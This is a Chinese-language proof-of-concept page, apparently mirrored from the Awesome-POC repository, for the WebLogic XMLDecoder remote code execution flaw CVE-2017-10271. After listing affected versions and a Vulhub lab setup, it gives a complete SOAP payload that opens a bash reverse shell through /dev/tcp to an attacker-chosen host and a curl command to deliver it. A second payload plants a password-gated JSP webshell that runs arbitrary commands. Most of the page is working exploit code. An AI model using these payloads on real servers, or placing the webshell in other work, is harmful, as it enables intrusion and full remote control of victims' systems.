admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-07 03:44:10 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/中间件漏洞/Weblogic XMLDecoder 远程代码执行漏洞 CVE-2017-10271.md
Threekiii 11de4c1d47 update
2024-11-06 14:10:36 +08:00

113 lines
3.4 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Weblogic XMLDecoder 远程代码执行漏洞 CVE-2017-10271
## 漏洞描述
Weblogic的WLS Security组件对外提供webservice服务其中使用了XMLDecoder来解析用户传入的XML数据在解析的过程中出现反序列化漏洞导致可执行任意命令。
## 漏洞影响
```
Weblogic 10.3.6.0.0
Weblogic 12.1.3.0.0
Weblogic 12.2.1.0.0
Weblogic 12.2.1.2.0
```
## 环境搭建
Vulhub 搭建 weblogic 10.3.6.0 环境:
```
git clone https://github.com/vulhub/vulhub.git
cd vulhub/weblogic/CVE-2017-10271
docker-compose up -d
```
启动完成后访问`http://your-vps-ip:7001/console`可以看到管理界面。
![](images/Weblogic%20XMLDecoder%20反序列化远程代码执行漏洞%20CVE-2019-2725/image-20240422141240591.png)
## 漏洞复现
访问 `http://your-ip:7001/wls-wsat/CoordinatorPortType`,若存在,则可能存在漏洞。其他可利用 URL
```plain
/wls-wsat/CoordinatorPortType
/wls-wsat/RegistrationPortTypeRPC
/wls-wsat/ParticipantPortType
/wls-wsat/RegistrationRequesterPortType
/wls-wsat/CoordinatorPortType11
/wls-wsat/RegistrationPortTypeRPC11
/wls-wsat/ParticipantPortType11
/wls-wsat/RegistrationRequesterPortType11
```
![](images/Weblogic%20XMLDecoder%20远程代码执行漏洞%20CVE-2017-10271/image-20240422141841164.png)
将以下 xml 数据保存为 poc.xml
```
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.4.0" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>bash -i &gt;&amp; /dev/tcp/<your-vps-ip>/<your-vps-port> 0&gt;&amp;1</string>
</void>
</array>
<void method="start"/></void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
```
使用 curl 以 post 方法上传 poc.xml反弹shell
```shell
curl -v -X POST -H "Content-Type: text/xml" --data @poc.xml "http://your-ip:7001/wls-wsat/CoordinatorPortType"
```
![](images/Weblogic%20XMLDecoder%20远程代码执行漏洞%20CVE-2017-10271/image-20240422142240394.png)
![](images/Weblogic%20XMLDecoder%20远程代码执行漏洞%20CVE-2017-10271/image-20240422142305482.png)
也可以写入 webshell
```
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java><java version="1.4.0" class="java.beans.XMLDecoder">
<object class="java.io.PrintWriter">
<string>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/test.jsp</string>
<void method="println"><string>
<![CDATA[
<% if("023".equals(request.getParameter("pwd"))){ java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream(); int a = -1; byte[] b = new byte[2048]; out.print("<pre>"); while((a=in.read(b))!=-1){ out.println(new String(b)); } out.print("</pre>"); } %>
]]>
</string>
</void>
<void method="close"/>
</object></java></java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
```
访问 webshell
```
http://your-ip:7001/bea_wls_internal/test.jsp?pwd=023&i=whoami
```
![](images/Weblogic%20XMLDecoder%20远程代码执行漏洞%20CVE-2017-10271/image-20240422142615570.png)
Reference in New Issue View Git Blame Copy Permalink